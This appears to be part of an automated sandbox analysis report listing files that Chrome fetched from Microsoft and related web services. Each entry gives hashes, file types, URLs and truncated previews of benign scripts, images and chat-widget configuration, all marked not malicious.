                                                                                                                                    Preview:RIFFN+..WEBPVP8 B+..p....*@...>...B!......a--.+M. ]?O..(..'..o...U......$.:...}.?.....m...<.}.........~..........sx.z..[......|OP...@?.._.Y.........|...O._...~....?F....u.*\t..../L...`0....vs4..I..W...o......>+|...0.2....Le.o.zGn...z..DW..k....ft...K...gB....qQ...1.4..#.e<!BP.DR.........9....."7..i.rXZp....buQ.....Ky....3..e{.\. m...k0......P.....-.......w...qO......o...{...W.....w9?..g.W...""E.]$........(...a..O........RQ.....-?.y.....^8.k....N....!".W..Ltr........p..@.P....Uq..>?i.S.=...4.-...f.?G4....@..B.({.i..PQC.&.o.j...S-.?...^O@""......t.B.#..D....YjK..8....7|q.,c..%.$.4T...h.B.6j.#.....s.E.O...6..#....B[...^....?.-...`.y....=..U$.'..b|s...l!=....m.6\.h|D..e..#.j....!Q..M.gf..Q.....l.H.2'.w.X..E.P.{5.S....c..E.....*0d}e9.*.....#5y!.Q.NX..U.I@e.N.0.1.x..ELg".M...I.d...y...~.....J.tw..;.....4{?.8..Z....Aa....l..Y.....fTE.ho_.a.&oI......a...T%.F.9.2.....q....=..L..f./...._..t.f.=[..QS&.:.?.G.~_Or...QO.G....x.q.)d.x...5....DC2.!.....!qb
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2432
                                                                                                                                    Entropy (8bit):4.834130257531367
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F25FEC6821F63D701A6B6291A4011894
                                                                                                                                    SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                                                                                    SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                                                                                    SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (4435), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):4435
                                                                                                                                    Entropy (8bit):5.011830430352786
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:6EA417AD8C1FD9EDCF7D24763917875D
                                                                                                                                    SHA1:8FE206FB2EBF53ABD340B43AD84A19294403BAB2
                                                                                                                                    SHA-256:D8EC429EFF1CCD03CDD385D1E2C883911358DC4D2BC48EC488DD720CC9EC1A79
                                                                                                                                    SHA-512:82A4C379A1ECD757FD5FFF431FAF25A5103D4F23AFC47E86C279EB8B12605EAA0A4478EB08A6E134657BA7FE8D49C6B7A08FB837DA0584A6C12B7715A58E0B70
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/engagement-window/window-confs/1832741830?cb=lpCb17447x53907
                                                                                                                                    Preview:lpCb17447x53907({"id":1832741830,"name":"Power Platform Messaging English","description":"","json":{"logoAltText":"","scheme":{},"surveyAgentChatEnabled":false,"customVars":{},"postChatSurveyOnNonInteractiveChat":false,"sound":true,"smsPreFormId":"","surveyPreChatId":"315072652d636861742073757276657931343838333235343639353239","surveyPostChatEnabled":false,"language":"en-US","sendIconType":"arrow","widgets":false,"attachmentIcon":true,"clearHistory":true,"surveyOfflineId":"344f66666c696e652073757276657931343838333235343639323732","floatingWindow":false,"id":-1,"agentImage":false,"logoRedirectUrl":"","email":true,"agentAvatar":"true","surveyPreChatEnabled":false,"customStyle":{"v":"2.0","meta":{"fonts":{"1":"Arial,Helvetica,sans-serif"},"colors":{"11":"#f2f2f2","1":"#0363ad","2":"#000000","3":"#FFFFFF","4":"#b6b6b6","5":"#6D6E70","6":"#50e6ff","7":"#D2D2D2","8":"#243a5e","9":"#ffffff","10":"#6e6e6e"}},"config":{"transcript_bubble_agent_text":{"attrs":{"style":{"color":"{{colors.2}}","fo
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):93450
                                                                                                                                    Entropy (8bit):7.997528228307785
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:2CF33A28A94D25F04A81319E53357A13
                                                                                                                                    SHA1:6A74A2BBAC908704424993A3037BA3742D0929E7
                                                                                                                                    SHA-256:7F7471D2767CB2ACA1074036DC03CC5DAB6B4B2D64EBA954BE2C6D133DB9D6E5
                                                                                                                                    SHA-512:B6A42A7E723DD01C18A51C4F205E0A38CC583FE43AB50A2FF47E03AAF1F43886533BA146AEC2D5AF4DB404C44131CCCAE8A47A2A2E3D25501DEC3CBE6CE491E7
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Resouces-02-416X179?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1010&hei=433&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............k....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................k.mdat.....&?....4..2....0....+o?..!..Cm#.d."........].....L.%...~...X.sKA.FD..p....*-.....5.=..Lv.W.f...:..N......I..W.....4.v......|..*.....`..r2..9( ..{U.....hp.J"50...4.b...}.tq..o......3.R%$Q...r....".8J...<h.5..O.{...Z|.......z:...<V...Y....].o.U.Q.r.v.qZ..L....6..O.h.8.......%]ml.V..Gc.$.. .t...1..V8.*.o.z.!.@..0.X..<.,.p!`h.....$#.....c.yT+.e..,.!YH.eIuQ.B83...[D. lO2:....waN...K.J&-..h....B./.K.65@..n.m.....X.z!..Q).^..E.;....>.0..S...4M.j=%07..X...i..I..,iF...i....S..._..0.>C.4.K.$.b..5M.....3R... ....t.#Qg=M.tZ...r......y....O....[.%.t{%.Q..;.{=;..RN..,..|i.~Q....D.....&.B.+........A{.r.M[..|]...I4...d...F.YP.`m..?....3..G{.S.a._.o.U.o>.' ...;.r....y.......H.oe.. E..q.. ......T.j..x
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:exported SGML document, ASCII text, with very long lines (366)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1904
                                                                                                                                    Entropy (8bit):4.802036868832552
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:305E80CB22D0F14E474C408C181CB792
                                                                                                                                    SHA1:8B946E3AD049A39E3BBC925B1D40BBE2F2A7E2B6
                                                                                                                                    SHA-256:A8FB92359BE5D0FB839DED898756E674A74C9A52DA8340431C2CF24B05AA43C5
                                                                                                                                    SHA-512:4F398BC8323454C5213EF37A5425A7FB114CE251A8C63C5112001DE1879EA23BBBD8A0C96DA78B7F189C659D63AFE273D90833DB464AEDBA98F6F32EF98BE8D9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:'use strict';function getSkuMarkup(a,c){let b=a.discountedTextTemplate;a.isDiscounted&&b&&(b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.ListPriceKey,c.sku.displayListPrice),b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.MsrpKey,c.sku.displayMSRPPrice));const d=`. <div . class="sku__pricing-discount">. <span class="oc-displayMSRPPrice">${c.sku.displayMSRPPrice}</span>. </div>. `,e=`. <div class="sku__detail-recurrence">. <span class="oc-displayUnit">${a.displayUnitMap[c.productId]}. </span>. </div>. `;return`. <div class="sku__title" data-ocr-pricing-render="title">. <h3 class="oc-product-title">${a.renderTitle}</h3>. </div>. <div class="sku__paragraph" data-ocr-pricing-content="paragraph"></div>. ${a.isDiscounted?`. <p class="sr-only" data-ocr-pricing-render="sc
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):136907
                                                                                                                                    Entropy (8bit):7.9983188309260465
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:63A7B7E8E07E90552F6FF9CB30F56A4C
                                                                                                                                    SHA1:45E416838F6693753C72A782E0ED2C20A78CD097
                                                                                                                                    SHA-256:064C5462A9E2CD3365785D44417A141C44C67FE886D607EC338C313862B87364
                                                                                                                                    SHA-512:0296095290C4B8201E37E4EE697CD81F742E54DC3B4FCDB12BDA7AE4E295FBD9BC14DA47E8D9357D7B3A9EF39BF54E1B107F14D715EE6B26C981C3463A75CB5F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Resouces-03-416X179?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1010&hei=433&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.....&?....4..2....0....C7.jv..-^;.r%..`d...;.~.<.1.(Q.q.cO..e9p@Z@..B..`.a/.d.H....#..e>\.4.*.......^..];...3u...V.zj...H.......NP.O.[..B..(..y>..=..m..X.C...,P......].`nB.:C}.6..o.H..?.<...f..w.......%.w.....o:. .........c..bH*..k"....>M}..*.%92.Z.B^.P...8...|..c...Y..{..x...S.{.X.....t..?....v....5..#....K4..Pn.....{..............\._...R.Q...I.....,..)K../;&.u$...........l'.6.^(......]`.gr.l..z...E.4.#$.]$....o.e....;V\o..@...V(.u..$....V....'..hq..>S...Q..Z;H.a|.[S...G.4.....yU9.M......B.0F... D.P(]R-..(..{.6.E....b..Y..x....7...$".}.T..^_...y.y.Oe..rQ.E..V...W=..-t...nT.b......B.9.)...(....z...i.CL`. ).O....o..mcS.0.O..EX.+.e.F...3.E.;+.....'?.1.o\..FBo...\.v..Q..~L\
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):7370
                                                                                                                                    Entropy (8bit):3.75734059903263
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:78CAE0B5E8FB1E22438351F87E648B9C
                                                                                                                                    SHA1:DDA45E1E6E25100736B33A4614869200FF59556C
                                                                                                                                    SHA-256:689F7AA37A90110B616381333171DE18B3F3A06B3B965FCE73BBBB84D0B777D7
                                                                                                                                    SHA-512:43E48DF413591881F27A96858B7FA4EC77EFF66D56C64BE81D04F5A85F2701374E871F021B1BDE808211BE4D40B12A10F28D2AF5BF520BC523FAD909144C242C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/icons/Share-insights.svg
                                                                                                                                    Preview:<svg width="23" height="24" viewBox="0 0 23 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.25 4.5C12.1797 4.5 13.0547 4.67578 13.875 5.02734C14.6953 5.37891 15.4102 5.86328 16.0195 6.48047C16.6289 7.09766 17.1094 7.8125 17.4609 8.625C17.8125 9.4375 17.9922 10.3125 18 11.25C18 11.7422 17.9688 12.2031 17.9062 12.6328C17.8437 13.0625 17.7461 13.4727 17.6133 13.8633C17.4805 14.2539 17.3086 14.6406 17.0977 15.0234C16.8867 15.4063 16.6367 15.7969 16.3477 16.1953C16.1211 16.5078 15.9219 16.7891 15.75 17.0391C15.5781 17.2891 15.4375 17.5391 15.3281 17.7891C15.2188 18.0391 15.1367 18.3125 15.082 18.6094C15.0273 18.9063 15 19.2539 15 19.6523V21.75C15 22.0625 14.9414 22.3555 14.8242 22.6289C14.707 22.9023 14.5469 23.1406 14.3438 23.3438C14.1406 23.5469 13.9023 23.707 13.6289 23.8242C13.3555 23.9414 13.0625 24 12.75 24H9.75C9.4375 24 9.14453 23.9414 8.87109 23.8242C8.59766 23.707 8.35938 23.5469 8.15625 23.3438C7.95312 23.1406 7.79297 22.9023 7.67578 22.6289C7.55859 22.3555 7.5 2
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (1578)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):344673
                                                                                                                                    Entropy (8bit):4.96730351838445
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:C14F93E32185A9F2F08D1896BB19DE6E
                                                                                                                                    SHA1:9668A879A6142E6E75148E2CF41203177E0411B6
                                                                                                                                    SHA-256:68982E0A892E454C05AF6058360AE8BD06122E0195604C567C81AF99F113545A
                                                                                                                                    SHA-512:DC2B8DE6863363F94F5B193FB88870C6CB84C56F10F0A29F9AAFB3CFDE469F104630F57D2B1500D8B87081344D747E6293FF4A97A6C2D2B434EB4F92283BD5F7
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:var engagementFix = (function () {. var engEl;.. function focus(eng) {. //Jaime MR test change setting upstream. // Run if a button was detected. if (eng.engagementType === 5) {. // Look in dom for a role of button. We only need to do this once because each button load will cause this to run.. setTimeout(function () {. var button = document.querySelector('[role="button"]');.. if (button) {. button.removeAttribute('role');. }. }, 200);. }.. if (eng.engagementType === 23) {. document.querySelectorAll('[data-LP-event="close"]')[0].click();. }.. engEl = document.getElementById('chatEngagement');.. if (engEl != null) {. setTimeout(function () {. document.getElementById('chatEngagement').focus();. }, 200);. } else {. setTimeout(function () {. var engageme
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):306991
                                                                                                                                    Entropy (8bit):7.999079271084784
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:AC077690B702C56C194805A9B93AD22C
                                                                                                                                    SHA1:C696DD409856DE7BABA70F666639E49A829E4FEA
                                                                                                                                    SHA-256:09707687A5A4D6EA4650B6B97F6443FB5CB61DE2E8B0E09A85433B6467864A65
                                                                                                                                    SHA-512:B9E22270438482F3CA968193FAF6D7C4DF0E1D43C1DD0F0B074D7BA61AF2194DB0939ABC70741C96E65003761A09812FFE8E4D4EE3270F00514E4AB41A11E0D2
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Accordian-01-593X334?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2998&hei=1689&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat........Lp@CA.2...D.........1k.=*.[jJ3"} .NG!....y..s.V.c?m.k..|k9<.Vw.s.F..@itm.x..G.....k..-d.........Dc.s.....o.....Xm\.L..z...*.s".6....>...<.^..4.h.Z...._"&..I.3....X..z..........f...[.......Z........P...#5....v.2t.7......=K.6.F...K{.D.P.x+A....g.F..J../.........C..C.X......AG~2.v.w.4.....t..gQ....Ed^....#.....2.0.a..m.....X3o.>....a.."B{.$v...e.....S.....?..W.2...U...0P...6h........L..=.f..d.|j..1..,I...^!")./.[.....0{........k..9.T;..y{.M.c..:.....u.zK....]t"........x...et~.S.Yl...h.F..b.{...) ..L^1g...6x..M.lE...6x.w&Qay....04..bfG.it.P.U.......J./rt...4..$G.dc'.........Q..&J86..z/.D.|.9^..//..E...0..f!../g\D..:.^.L.fu....`..u@....ld+....2.;I..NI..?me0...G^....i...P....@:
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):52717
                                                                                                                                    Entropy (8bit):5.462668685745912
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                    SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                    SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                    SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                    Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (584)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):6798
                                                                                                                                    Entropy (8bit):5.383941368080596
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                                    SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                                    SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                                    SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                                                                                    Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (534)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3288
                                                                                                                                    Entropy (8bit):4.844125421768654
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:7677F65C1626AB1BDE509437776D4291
                                                                                                                                    SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                                                                                    SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                                                                                    SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-events.min.ACSHASH7677f65c1626ab1bde509437776d4291.js
                                                                                                                                    Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3280
                                                                                                                                    Entropy (8bit):4.696081700274861
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                                    SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                                    SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                                    SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-onecloud-util.min.ACSHASH1c7e214f5af8caa06f783a38d40127c6.js
                                                                                                                                    Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):306
                                                                                                                                    Entropy (8bit):4.918725003124441
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:0ED6A4BBAC11D3B19565F7F4F11D7FBE
                                                                                                                                    SHA1:26D0A4F103F89E841B57956240FF0BA142DEEA70
                                                                                                                                    SHA-256:3827D704E1284CAD183FA3F78D37C1CE2DDD37A3D71450ACCD173A8AB369B77D
                                                                                                                                    SHA-512:FB8680FFC0904EE89E1BE9C8E62A68825C52C649600CAB1C10105C4AA04ACA325780430800D179A687EA81635D509BBBA23D5796B619B209A23A5BE8132997A5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M21 6.43359V24H3V0H14.5664L21 6.43359ZM15 6H18.4336L15 2.56641V6ZM19.5 22.5V7.5H13.5V1.5H4.5V22.5H19.5ZM10.5 16.5H13.5V21H10.5V16.5ZM6 13.5H9V21H6V13.5ZM15 10.5H18V21H15V10.5Z" fill="#0078D4"/>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65389)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):67442
                                                                                                                                    Entropy (8bit):5.30249946871044
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:12C92D28028BCE370827AD3622A0754A
                                                                                                                                    SHA1:CB9561682F246BBFD6C239A0F37B5B186A794B5E
                                                                                                                                    SHA-256:CA99FD4F7E685076E62459191AC59A6156E0552433E73C62857E6CB06F60CE15
                                                                                                                                    SHA-512:6E881BE04BBACF7DE29492784793DD7BAA2F2F900BBF539BD574643D1A096F15BE0F663C6663F237B579C8DE443E5257BE80B5669DE290A43E0B2DD695FC2140
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC10ffc58a4a8a4d3c8b13ab7eae19c87b-source.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC10ffc58a4a8a4d3c8b13ab7eae19c87b-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RC10ffc58a4a8a4d3c8b13ab7eae19c87b-source.min.js', "var eventTagging,ruleCorrelationGuid=\"KIF-472b86e4-85d2-424d-a035-610fe2345c81\";console.log(ruleCorrelationGuid+\": Launcher Rule Fired\"),window.oa=window.oa||{},window.oa.tagging=window.oa.tagging||{data:{},setup:{complete:{}},factory:{}},window.oa.tagging.utfv=\"972d797ce0b44da215c18a21afe54745d27e7082\",function(){function e(e){return e in n?n[e]:e}var t=window.oa.tagging.factory,n={critical:10,error:20,warn:30,info:40};t.handler=function e(t,n,i){if(!(this instanceof e))return new e(t,n,i);this._utfversion=\"2018-06-27 16:14:51\",this.name=t,this.handleMethod=n,this.logLevel=i},t.handler.prototype={},t.handlerBlock=function e(){if(!(this instanceof e))return new e;this._utfversion=\"2018-0
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2235
                                                                                                                                    Entropy (8bit):4.235908927621097
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:1D6526DEA1E377470F4EDB86A75D6273
                                                                                                                                    SHA1:DE8EE2F5C4C7BB79851BCE11FEC4CFD13A6D3F74
                                                                                                                                    SHA-256:01B6F7E2663BAAD2460C51316B6C0132DC88FEC6E91AA7B22F08AD4BECC3DFAB
                                                                                                                                    SHA-512:58461D566C1EC9DF0018175FEE437EA4941F9E091A242F635BAC9EFA75330CF8119B7918E9D2F96A0C281743100F754E014C6B683D58B07958D3D046D2A6EE9F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
